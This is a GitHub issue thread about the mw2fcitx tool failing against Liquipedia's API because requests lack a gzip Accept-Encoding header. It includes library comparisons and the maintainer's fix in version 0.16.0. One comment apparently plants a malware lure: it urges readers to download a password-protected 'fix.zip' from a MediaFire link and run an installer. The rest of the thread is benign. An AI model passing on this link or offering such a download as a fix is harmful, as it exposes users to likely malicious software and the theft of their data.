### ISSUE TITLE
HTTP Error 406: Gzip encoding is required for API requests. See liquipedia.net/api-terms-of-use

### ISSUE THREAD

**Issue by RekiDunois** [outloudvi/mw2fcitx#26]
According to liquipedia.net/api-terms-of-use:

> Your client must accept gzip encoding (supply an "Accept-Encoding: gzip" HTTP header with every request).

Does this need to deal with the decoding of gzip? Or just add the header and python lib will decode it by it self?

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by outloudvi** [comment]
The built-in `urllib.request` [does not seem to do it](https://stackoverflow.com/questions/3947120/does-python-urllib2-automatically-uncompress-gzip-data-fetched-from-webpage) but [`requests`](https://requests.readthedocs.io/en/latest/community/faq/#encoded-data) and [`urllib3`](https://urllib3.readthedocs.io/en/stable/advanced-usage.html#brotli-encoding) does. `urllib3` even wrote in the docs about modifying the `Accept-Encoding` header manually.

I had a look at [`undici`](https://github.com/nodejs/undici/blob/c108287b85e63bf7c5ef0613c20bd0ee40474897/lib/web/fetch/index.js#L1517-L1521) and [`node-fetch`](https://github.com/node-fetch/node-fetch?tab=readme-ov-file#options) from Node.js, and they both support and have compression enabled by default. Maybe it's a great idea for `mw2fcitx` to also move to `requests` and setup compression by default.

**Comment by outloudvi** [comment]
[Version 0.16.0](https://pypi.org/project/mw2fcitx/0.16.0/) should have it handled. Please feel free to have a try.
